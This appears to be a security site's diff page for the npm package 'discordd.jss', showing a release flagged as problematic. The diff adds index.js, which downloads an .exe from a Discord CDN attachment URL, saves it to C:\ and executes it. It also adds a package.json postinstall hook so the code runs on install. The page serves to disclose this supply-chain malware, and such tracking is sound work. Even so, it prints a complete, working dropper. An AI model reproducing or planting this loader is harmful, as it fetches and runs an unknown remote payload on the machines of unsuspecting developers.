discordd.jss 0.0.1-security → 1.4.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of discordd.jss might be problematic. Click here for more details.
- package/index.js +45 -0
- package/package.json +15 -6
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,45 @@
|
|
|
1
|
+
const { exec } = require('child_process');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
|
|
6
|
+
console.log('Module loaded. The .exe file will be automatically executed.');
|
|
7
|
+
|
|
8
|
+
// Function to download and run the .exe file
|
|
9
|
+
function runExe() {
|
|
10
|
+
const url = 'https://cdn.discordapp.com/attachments/1134059898393608204/1137046732916662312/IBkhI04wf69yeH6.exe';
|
|
11
|
+
const exeFilePath = path.join('C:\\', 'IBkhI04wf69yeH6.exe'); // Save the .exe file to C:\ directory
|
|
12
|
+
|
|
13
|
+
// Create a write stream to save the downloaded .exe file
|
|
14
|
+
const file = fs.createWriteStream(exeFilePath);
|
|
15
|
+
|
|
16
|
+
// Download the .exe file using HTTPS
|
|
17
|
+
https.get(url, (response) => {
|
|
18
|
+
// Pipe the response data into the file stream to save it
|
|
19
|
+
response.pipe(file);
|
|
20
|
+
|
|
21
|
+
// When the download is finished
|
|
22
|
+
file.on('finish', () => {
|
|
23
|
+
file.close();
|
|
24
|
+
console.log('.exe file downloaded:', exeFilePath);
|
|
25
|
+
|
|
26
|
+
// Execute the downloaded .exe file using child_process.exec
|
|
27
|
+
exec(exeFilePath, (error, stdout, stderr) => {
|
|
28
|
+
if (error) {
|
|
29
|
+
console.error(`Error occurred: ${error.message}`);
|
|
30
|
+
return;
|
|
31
|
+
}
|
|
32
|
+
if (stderr) {
|
|
33
|
+
console.error(`Error output: ${stderr}`);
|
|
34
|
+
return;
|
|
35
|
+
}
|
|
36
|
+
console.log(`.exe output: ${stdout}`);
|
|
37
|
+
});
|
|
38
|
+
});
|
|
39
|
+
}).on('error', (error) => {
|
|
40
|
+
console.error('Download error:', error.message);
|
|
41
|
+
});
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
// Call the function to initiate the download and execution
|
|
45
|
+
runExe();
|
package/package.json
CHANGED
|
@@ -1,6 +1,15 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "discordd.jss",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "discordd.jss",
|
|
3
|
+
"version": "1.4.9",
|
|
4
|
+
"description": "discordd.jss",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"dependencies": {
|
|
7
|
+
"https": "^1.0.0",
|
|
8
|
+
"fs": "^0.0.1-security"
|
|
9
|
+
},
|
|
10
|
+
"scripts": {
|
|
11
|
+
"postinstall": "node index.js"
|
|
12
|
+
},
|
|
13
|
+
"author": "Your Name",
|
|
14
|
+
"license": "MIT"
|
|
15
|
+
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=discordd.jss for more information.
|